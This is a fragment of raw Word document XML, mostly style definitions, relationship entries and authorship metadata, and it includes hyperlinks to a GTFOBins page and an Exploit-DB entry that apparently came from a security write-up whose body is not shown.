    <w:unhideWhenUsed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character" w:styleId="843" w:customStyle="1">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="840"/>
    <w:link w:val="835"/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="844" w:customStyle="1">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="840"/>
    <w:link w:val="836"/>
    <w:uiPriority w:val="9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28"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="845" w:customStyle="1">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="840"/>
    <w:link w:val="837"/>
    <w:uiPriority w:val="9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28"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="846" w:customStyle="1">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="840"/>
    <w:link w:val="838"/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:iCs/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="847" w:customStyle="1">
    <w:name w:val="Heading 6 Char"/>
    <w:basedOn w:val="840"/>
    <w:link w:val="839"/>
    <w:uiPriority w:val="9"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8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="848" w:customStyle="1">
    <w:name w:val="bang"/>
    <w:basedOn w:val="850"/>
    <w:link w:val="849"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:pBdr/>
      <w:spacing w:after="0" w:before="120" w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="567"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="auto"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="849" w:customStyle="1">
    <w:name w:val="bang Char"/>
    <w:basedOn w:val="840"/>
    <w:link w:val="848"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="850">
    <w:name w:val="Caption"/>
    <w:basedOn w:val="834"/>
    <w:next w:val="834"/>
    <w:uiPriority w:val="35"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="44546a" w:themeColor="text2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="851" w:customStyle="1">
    <w:name w:val="hinhhhh"/>
    <w:basedOn w:val="834"/>
    <w:link w:val="852"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:pBdr/>
      <w:tabs>
        <w:tab w:val="left" w:leader="none" w:pos="567"/>
        <w:tab w:val="left" w:leader="none" w:pos="851"/>
      </w:tabs>
      <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
      <w:ind/>
      <w:contextualSpacing w:val="true"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="852" w:customStyle="1">
    <w:name w:val="hinhhhh Char"/>
    <w:basedOn w:val="840"/>
    <w:link w:val="851"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="853">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="834"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind w:left="720"/>
      <w:contextualSpacing w:val="true"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="854" w:customStyle="1">
    <w:name w:val="Trang Bìa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0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:right="0" w:firstLine="0" w:left="0"/>
      <w:contextualSpacing w:val="false"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Calibri" w:cs="Cordia New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8"/>
      <w:highlight w:val="none"/>
      <w:u w:val="none"/>
      <w:vertAlign w:val="baseline"/>
      <w:rtl w:val="0"/>
      <w:cs w:val="0"/>
      <w:lang w:val="en-AU" w:eastAsia="en-AU" w:bidi="th-TH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s://gtfobins.github.io/gtfobins/zip/" TargetMode="External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hyperlink" Target="https://www.exploit-db.com/exploits/41154" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.png"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5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Uoang T</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-12-14T10:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-12T21:15:47Z</dcterms:modified>
</cp:coreProperties>
</file>